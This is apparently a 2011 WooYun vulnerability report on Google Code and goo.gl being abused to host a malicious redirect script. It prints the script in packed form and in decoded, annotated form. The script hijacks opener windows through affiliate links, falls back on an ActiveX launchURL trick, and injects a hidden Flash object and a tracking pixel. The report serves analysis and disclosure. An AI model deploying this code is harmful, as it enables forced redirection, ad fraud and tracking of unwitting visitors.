2011-02-15: 积极联系厂商并且等待厂商认领中,细节不对外公开 2011-02-15: 厂商已经主动忽略漏洞,细节向公众公开
Google的一些互联网业务,包括Google Code和Google短网址服务被恶意钓鱼和垃圾广告利用
http://bijioc.googlecode.com/svn/trunk/js/navigatenormal.js?v=TueFeb152011.js
// Sample as hosted on the googlecode SVN URL above (analyst annotation; code unchanged).
// Note: this top-level urlarr is shadowed — the packed body below declares its own
// `var urlarr` with the same two goo.gl links inside _bijioc.powerboom, so this line is
// effectively unused by the script. The two short links are the redirect targets.
var urlarr = ["http://goo.gl/NZZl", "http://goo.gl/2bEs"];
// Obfuscated with the common `p,a,c,k,e,d` packer: the first string argument is the code
// with identifiers replaced by base-62 indices, the last string (split on '|') is the
// symbol table. The decoded form follows under "转换后". The line break inside the packed
// string literal is a rendering artefact of this page, not part of the original file.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 1j=Z 2e("(9.F.3)|(9.1b.q)|(9.1b.1g)|(9.2f.3)|(X.q.12.3)|(X.12.3)|(2i.1p.q)|(1k.1p.q)|(X.2b.26.q)|(1k.3)|(9.25.3)|(9.24.3)|(9.27.3)|(28.3)|(9.2a.3)|(29.F.3)|(m.F.3)|(F.2j)|(2k.3)|(2u.3)|(2t.3)|(2v.3)|(2w.3)","i");4("A"==G(I))I="2y";4("A"==G(1c))1c=2x;6 2=[];6 n=v;a{4(H&&H.f&&H.5.2s("2r")){n=H}}g(e){}2.Y=[["8://9.2l.3/?2n=2o",23],["8://p.2q.3/c?s=2p&w=2z&c=1W&i=1M&l=0&e=&t=8://9.1L.3/1O.1P",1K]];2.1i=h(){a{6 R=["8://S.T/1F","8://S.T/1G"];4(5.k){2.Q.1J(R[1H(1I.1Q()*R.J)]);2.Q=13;1Y.1Z()}}g(e){}};2.1d=h(){a{4(5.k&&"A"==G(21)){2.Q=5.18("<E y=0 o=0 1r=\'1S:1T-1V-22-1X-1N\'></E>");v.k("20",2.1i)}}g(e){}};2.1o=V;2.W=V;2.U=h(j){a{n.r.r.1e(j)}g(e){a{n.r.1e(j)}g(2J){a{n.r.1f=j}g(2A){2.1d();2.W=1n}}}};2.O=h(j){4(2.Y.J>0){6 P=2.Y.3f();2.U(P[0]);4(!2.W){1a("2.O(\'"+j+"\')",P[1])}}u{2.U(j)}};2.M=h(){6 N="8://3h.1g.3i/3d.3c?s="+I;4(5.k){N+="&c="+v.1f.37}2.O(N)};4(n.r){4(1j.3b(n.5.3a)){2.1o=1n;4("A"==G(1m)){2.M()}u 4("3n"==1m){}u{2.M()}}}2.1E=h(1q){6 L=5.10.1l("; ");3o(6 i=0;i<L.J;i++){6 K=L[i].1l("=");4(1q==K[0])19 2L(K[1])}19""};2.1u=h(11){D=Z 2I();D.2H(D.2C()+15);5.10="1C="+2D(11)+"; 2G="+D.2P()+";2Q=/"};2.C=h(){4(5.1s==13){1a(2.C,31)}u{6 d=5.18("33");d.B.y="0";d.B.o="0";d.B.2Y="2X";d.B.2S="-2R";6 z="8://17.14.3/16/1h/1A/1B.1D";a{4(!5.k&&(2T.2U.2W("2V")>-1)){z="8://17.14.3/16/1h/1A/1B.1D?b=32"}}g(e){}d.1v=\'<E 1r="2Z:30-2F-2E-2B-2N" 2O="8://2M.1x.3/35/1w/2K/1t/34.3m#3r=7,0,0,0" y="0" o="0"><3p 3q="3k" 3l="\'+z+\'" /><39 1y="\'+z+\'" y="0" o="0" 38="36/x-1w-1t" 3j="8://9.1x.3/3g/3e" /></E>\';6 1z=2.1E("1C");4("1"!=1z){d.1v+="<1U 1y=\'8://S.T/1R\' y=\'0\' o=\'0\' 
2m=\'0\'/>";2.1u("1")}5.1s.2c(d)}};a{4(5.k){v.k("2h",2.C)}u{v.2g("2d",2.C,V)}}g(e){}',62,214,'||_bijioc|com|if|document|var||http|www|try|||node|||catch|function||lochref|attachEvent|||_win|height||cn|opener|||else|window|||width|fp|undefined|style|appendpiece|date|object|baidu|typeof|parent|_jdcustomize|length|aCrumb|aCookie|justnavigate|urlr|navigateToUrl|nf|pnode|urlarr|goo|gl|navigateIt|false|hb|search|nHref|new|cookie|sValue|yahoo|null|googlecode||svn|bijioc|createElement|return|setTimeout|google|_jdcid|navigatePower|navigate|location|co|trunk|powerboom|_searchSites|bing|split|_lochref|true|ho|118114|sName|classid|body|flash|setcookie|innerHTML|shockwave|macromedia|src|_co|flv|broadpage|oc_biji|swf|getcookie|NZZl|2bEs|parseInt|Math|launchURL|600|vipshop|2882|00C04F79FAA6|index|php|random|CLEC|CLSID|6BF52A52|img|394A|4018|B153|self|focus|onunload|_nonapower|11D3|800|sogou|soso|vnet|taobao|gougou|cache|gouwo|114|appendChild|load|RegExp|youdao|addEventListener|onload|114search|asp|hao123|vancl|border|source|josion|788e4edd|yiqifa|fulliframe|getElementById|114la|265|115|etao|10011813|normal|148042|e3|96b8|getMinutes|escape|11cf|ae6d|expires|setMinutes|Date|e2|cabs|unescape|fpdownload|444553540000|codebase|toGMTString|path|100px|left|navigator|userAgent|Firefox|indexOf|absolute|position|clsid|d27cdb6e|200|ff|DIV|swflash|pub|application|host|type|embed|referrer|test|html|gomall|getflashplayer|shift|go|ocbiji|cc|pluginspage|movie|value|cab|donotnavigate|for|param|name|version'.split('|'),0,{}))
解包（去混淆）后的代码：
// ---- Analyst annotation of the decoded sample (code tokens unchanged, only reformatted) ----
// What the statements below do:
//  * if the page carrying this script has a window.opener and its own document.referrer
//    matches _searchSites (search engines / portals), the opener window is navigated through
//    the [url, delay] chain in _bijioc.nHref and then to ocbiji.co.cc/gomall.html;
//  * on load, an off-screen Flash object (broadpage.swf from the googlecode SVN) and a
//    goo.gl tracking image are injected into the page; the image is rate-limited to once
//    per 15 minutes by the oc_biji cookie.
// Network indicators visible in this listing: www.vancl.com, p.yiqifa.com, www.vipshop.com,
// ocbiji.co.cc, bijioc.googlecode.com, goo.gl/NZZl, goo.gl/2bEs, goo.gl/CLEC.
// Globals read from the embedding page: _jdcustomize, _jdcid, _lochref, _nonapower.

// Referrer check list. The dots are unescaped, so each "." matches any character.
var _searchSites = new RegExp("(www.baidu.com)|(www.google.cn)|(www.google.co)|(www.youdao.com)|(search.cn.yahoo.com)|(search.yahoo.com)|(114search.118114.cn)|(bing.118114.cn)|(search.114.vnet.cn)|(bing.com)|(www.soso.com)|(www.sogou.com)|(www.taobao.com)|(gougou.com)|(www.gouwo.com)|(cache.baidu.com)|(m.baidu.com)|(baidu.asp)|(hao123.com)|(265.com)|(114la.com)|(115.com)|(etao.com)", "i");
// Campaign parameters; the embedding page may predefine them, otherwise defaults apply.
// _jdcid is assigned here but never read again in this listing.
if ("undefined" == typeof(_jdcustomize)) _jdcustomize = "normal";
if ("undefined" == typeof(_jdcid)) _jdcid = 10011813;
// Namespace holder (declared as an array, used as a plain object).
var _bijioc = [];
// When running inside a frame whose parent exposes `f` and an element with id "fulliframe",
// act on the parent window instead; the try/catch swallows cross-origin access errors.
var _win = window;
try {
  if (parent && parent.f && parent.document.getElementById("fulliframe")) {
    _win = parent
  }
} catch (e) {}
// [url, delay-ms] pairs the opener is sent to before the final destination (affiliate links).
_bijioc.nHref = [
  ["http://www.vancl.com/?source=josion", 800],
  ["http://p.yiqifa.com/c?s=788e4edd&w=148042&c=4018&i=2882&l=0&e=&t=http://www.vipshop.com/index.php", 600]
];
// IE-only (document.attachEvent) fallback, run on window unload: opens one of the two goo.gl
// short links through launchURL() of the ActiveX object created in navigatePower, drops the
// object reference and refocuses the current window. Target is chosen at random.
_bijioc.powerboom = function () {
  try {
    var urlarr = ["http://goo.gl/NZZl", "http://goo.gl/2bEs"];
    if (document.attachEvent) {
      _bijioc.pnode.launchURL(urlarr[parseInt(Math.random() * urlarr.length)]);
      _bijioc.pnode = null;
      self.focus()
    }
  } catch (e) {}
};
// IE-only: create a 0x0 ActiveX object by CLSID (6BF52A52-… appears to be the Windows Media
// Player control, which exposes launchURL — confirm against a CLSID listing) and hook
// powerboom to onunload. Skipped when the embedding page defines _nonapower.
_bijioc.navigatePower = function () {
  try {
    if (document.attachEvent && "undefined" == typeof(_nonapower)) {
      _bijioc.pnode = document.createElement("<object width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'></object>");
      window.attachEvent("onunload", _bijioc.powerboom)
    }
  } catch (e) {}
};
// ho: referrer check passed. hb: every cross-window navigation attempt threw and the
// ActiveX fallback has been armed (stops the timed chain in navigateToUrl).
_bijioc.ho = false;
_bijioc.hb = false;
// Navigate the opener's opener, then the opener, to lochref, via navigate() and then by
// assigning location; each failure (e.g. cross-origin access denied) falls through to the
// next technique, and the last failure arms the ActiveX fallback.
_bijioc.navigateIt = function (lochref) {
  try {
    _win.opener.opener.navigate(lochref)
  } catch (e) {
    try {
      _win.opener.navigate(lochref)
    } catch (e2) {
      try {
        _win.opener.location = lochref
      } catch (e3) {
        _bijioc.navigatePower();
        _bijioc.hb = true
      }
    }
  }
};
// Walk the nHref chain: visit the next affiliate URL, then re-schedule with the same final
// lochref after that entry's delay; when the chain is exhausted, go to lochref itself.
// The string form of setTimeout is an implicit eval with lochref spliced in unescaped.
_bijioc.navigateToUrl = function (lochref) {
  if (_bijioc.nHref.length > 0) {
    var nf = _bijioc.nHref.shift();
    _bijioc.navigateIt(nf[0]);
    if (!_bijioc.hb) {
      setTimeout("_bijioc.navigateToUrl('" + lochref + "')", nf[1])
    }
  } else {
    _bijioc.navigateIt(lochref)
  }
};
// Build the final destination; on IE the host of the page carrying this script is appended
// as &c=, so the destination learns which site the script was embedded in.
_bijioc.justnavigate = function () {
  var urlr = "http://ocbiji.co.cc/gomall.html?s=" + _jdcustomize;
  if (document.attachEvent) {
    urlr += "&c=" + window.location.host
  }
  _bijioc.navigateToUrl(urlr)
};
// Trigger: requires an opener and a document.referrer (of _win, not of the opener) matching
// the search-site list. Only _lochref === "donotnavigate" suppresses the redirect; any
// other value of _lochref behaves the same as undefined.
if (_win.opener) {
  if (_searchSites.test(_win.document.referrer)) {
    _bijioc.ho = true;
    if ("undefined" == typeof(_lochref)) {
      _bijioc.justnavigate()
    } else if ("donotnavigate" == _lochref) {
    } else {
      _bijioc.justnavigate()
    }
  }
}
// Read a cookie by name from document.cookie; returns "" when absent.
_bijioc.getcookie = function (sName) {
  var aCookie = document.cookie.split("; ");
  for (var i = 0; i < aCookie.length; i++) {
    var aCrumb = aCookie[i].split("=");
    if (sName == aCrumb[0]) return unescape(aCrumb[1])
  }
  return ""
};
// Set the oc_biji cookie with a 15-minute expiry and path=/. `date` is assigned without
// var and therefore leaks as a global.
_bijioc.setcookie = function (sValue) {
  date = new Date();
  date.setMinutes(date.getMinutes() + 15);
  document.cookie = "oc_biji=" + escape(sValue) + "; expires=" + date.toGMTString() + ";path=/"
};
// On load (polling every 200 ms until document.body exists): append a 0x0 DIV positioned
// off-screen that loads broadpage.swf from the googlecode SVN (with ?b=ff on Firefox) and,
// at most once per 15 minutes (oc_biji cookie), a 0x0 tracking image from goo.gl/CLEC.
_bijioc.appendpiece = function () {
  if (document.body == null) {
    setTimeout(_bijioc.appendpiece, 200)
  } else {
    var node = document.createElement("DIV");
    node.style.width = "0";
    node.style.height = "0";
    node.style.position = "absolute";
    node.style.left = "-100px";
    var fp = "http://bijioc.googlecode.com/svn/trunk/flv/broadpage.swf";
    try {
      if (!document.attachEvent && (navigator.userAgent.indexOf("Firefox") > -1)) {
        fp = "http://bijioc.googlecode.com/svn/trunk/flv/broadpage.swf?b=ff"
      }
    } catch (e) {}
    node.innerHTML = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="0" height="0"><param name="movie" value="' + fp + '" /><embed src="' + fp + '" width="0" height="0" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></object>';
    var _co = _bijioc.getcookie("oc_biji");
    if ("1" != _co) {
      node.innerHTML += "<img src='http://goo.gl/CLEC' width='0' height='0' border='0'/>";
      _bijioc.setcookie("1")
    }
    document.body.appendChild(node)
  }
};
// Register appendpiece on load: attachEvent on IE, addEventListener elsewhere.
try {
  if (document.attachEvent) {
    window.attachEvent("onload", _bijioc.appendpiece)
  } else {
    window.addEventListener("load", _bijioc.appendpiece, false)
  }
} catch (e) {}
增加业务的检查,避免被恶意利用
未能联系到厂商或者厂商积极拒绝
漏洞Rank:3 (WooYun评价)